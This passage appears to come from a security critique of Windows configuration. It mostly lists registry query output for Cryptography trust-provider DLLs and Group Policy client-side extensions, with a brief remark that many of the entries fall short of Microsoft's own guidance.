HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\SysWOW64\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\SysWOW64\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsecimpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\urlmon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\ieframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\SysWOW64\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\SysWOW64\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.4.1.311.10.3.3 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.2 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\2.16.840.1.113730.4.1 $DLL REG_SZ WINTRUST.DLL End of search: 97 match(es) found.Note: only 231 of these 607 entries comply with Microsoft’s own recommendation and security guidance, while the other 378 entries show a total number of 378 bugs!
Group Policy client side extensions:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" /F "D*Name" /S REM REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" /S /V "DisplayName" REM REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" /S /V "DllName"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{0ACDD40C-75AC-47ab-BAA0-BF6DE7E7FE63} DisplayName REG_EXPAND_SZ @wlgpclnt.dll,-100 DllName REG_EXPAND_SZ wlgpclnt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{0E28E245-9368-4853-AD84-6DA3BA35BB75} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-1 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{169EBF44-942F-4C43-87CE-13C93996EBBE} DllName REG_EXPAND_SZ AppManagementConfiguration.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{16be69fa-4209-4250-88cb-716cf41954e0} DisplayName REG_EXPAND_SZ @auditcse.dll,-4000 DllName REG_EXPAND_SZ auditcse.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{17D89FEC-5C44-4972-B12D-241CAEF74509} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-2 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{1A6364EB-776B-4120-ADE1-B63A406A76B5} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-3 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861} DisplayName REG_EXPAND_SZ @fdeploy.dll,-261 DllName REG_EXPAND_SZ fdeploy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{2A8FDC61-2347-4C87-92F6-B05EB91A201A} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-22 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{2BFCC077-22D2-48DE-BDE1-2F618D9B476D} DllName REG_EXPAND_SZ AppManagementConfiguration.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66} DisplayName REG_EXPAND_SZ @%SystemRoot%\System32\dskquota.dll,-100 DllName REG_EXPAND_SZ %SystemRoot%\System32\dskquota.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3A0DBA37-F8B2-4356-83DE-3E90BD5C261F} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-4 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{426031c0-0b47-4852-b0ca-ac3d37bfcb39} DisplayName REG_EXPAND_SZ @gptext.dll,-201 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{42B5FAAE-6536-11d2-AE5A-0000F87571E3} DisplayName REG_EXPAND_SZ @gpscript.dll,-1 DllName REG_SZ C:\Windows\System32\gpscript.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4B7C3B0F-E993-4E06-A241-3FBE06943684} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-22 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4bcd6cde-777b-48b6-9804-43568e23545d} DisplayName REG_EXPAND_SZ @%SystemRoot%\System32\TsUsbRedirectionGroupPolicyExtension.dll,-100 DllName REG_EXPAND_SZ %SystemRoot%\System32\TsUsbRedirectionGroupPolicyExtension.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4CFB60C1-FAA6-47f1-89AA-0B18730C9FD3} DisplayName REG_SZ @C:\Windows\System32\iedkcs32.dll,-3051 DllName REG_SZ C:\Windows\System32\iedkcs32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4D2F9B6F-1E52-4711-A382-6A8B1A003DE6} DllName REG_SZ C:\Windows\System32\tsworkspace.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4d968b55-cac2-4ff5-983f-0a54603781a3} DisplayName REG_EXPAND_SZ @WorkFoldersGPExt.dll,-261 DllName REG_EXPAND_SZ WorkFoldersGPExt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{5794DAFD-BE60-433f-88A2-1A31939AC01F} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-5 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6232C319-91AC-4931-9385-E70C2B099F0E} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-6 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6A4C88C6-C502-4f74-8F60-2CB23EDC24E2} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-7 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7150F9BF-48AD-4da4-A49C-29EF4A8369BA} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-8 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{728EE579-943C-4519-9EF7-AB56765798ED} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-9 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{74EE6C03-5363-4554-B161-627540339CAB} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-10 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7909AD9E-09EE-4247-BAB9-7029D5F0A278} DllName REG_EXPAND_SZ dmenrollengine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7933F41E-56F8-41d6-A31C-4148A711EE93} DllName REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7B849a69-220F-451E-B3FE-2CB811AF94AE} DisplayName REG_SZ @C:\Windows\System32\iedkcs32.dll,-3051 DllName REG_SZ C:\Windows\System32\iedkcs32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A} DisplayName REG_EXPAND_SZ @(runtime.system32)\scecli.dll,-7650 DllName REG_EXPAND_SZ scecli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{8A28E2C5-8D06-49A4-A08C-632DAA493E17} DisplayName REG_EXPAND_SZ @%systemroot%\system32\gpprnext.dll,-1 DllName REG_EXPAND_SZ %systemroot%\system32\gpprnext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{91FBB303-0CD5-4055-BF42-E512A681B325} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-11 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{9650FDBC-053A-4715-AD14-FC2DC65E8330} DllName REG_EXPAND_SZ hvsigpext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A3F3E39B-5D83-4940-B954-28315B82F0A8} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-12 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{AADCED64-746C-4633-A97C-D61349046527} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-13 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B087BE9D-ED37-454f-AF9C-04291E351182} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-14 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053} DisplayName REG_EXPAND_SZ @dot3gpclnt.dll,-100 DllName REG_EXPAND_SZ dot3gpclnt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{BA649533-0AAC-4E04-B9BC-4DBAE0325B12} DllName REG_EXPAND_SZ pwlauncher.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{BC75B1ED-5833-4858-9BB8-CBF0B166DF9D} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-16 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C34B2751-1CF4-44F5-9262-C3FC39666591} DllName REG_EXPAND_SZ pwlauncher.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C418DD9D-0D14-4efb-8FBF-CFE535C8FAC7} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-17 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8} DllName REG_EXPAND_SZ %SystemRoot%\System32\cscobj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7} DisplayName REG_EXPAND_SZ @appmgmts.dll,-3252 DllName REG_EXPAND_SZ appmgmts.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{cdeafc3d-948d-49dd-ab12-e578ba4af7aa} DisplayName REG_EXPAND_SZ @gptext.dll,-204 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D} DisplayName REG_SZ @C:\Windows\System32\iedkcs32.dll,-3051 DllName REG_SZ C:\Windows\System32\iedkcs32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CFF649BD-601D-4361-AD3D-0FC365DB4DB7} DllName REG_EXPAND_SZ %SystemRoot%\system32\domgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{e437bc1c-aa7d-11d2-a382-00c04f991e27} DisplayName REG_EXPAND_SZ @C:\Windows\System32\polstore.dll,-5012 DllName REG_EXPAND_SZ %SystemRoot%\System32\polstore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E47248BA-94CC-49c4-BBB5-9EB7F05183D0} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-18 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E4F48E54-F38D-4884-BFB9-D4D2E5729C18} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-19 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 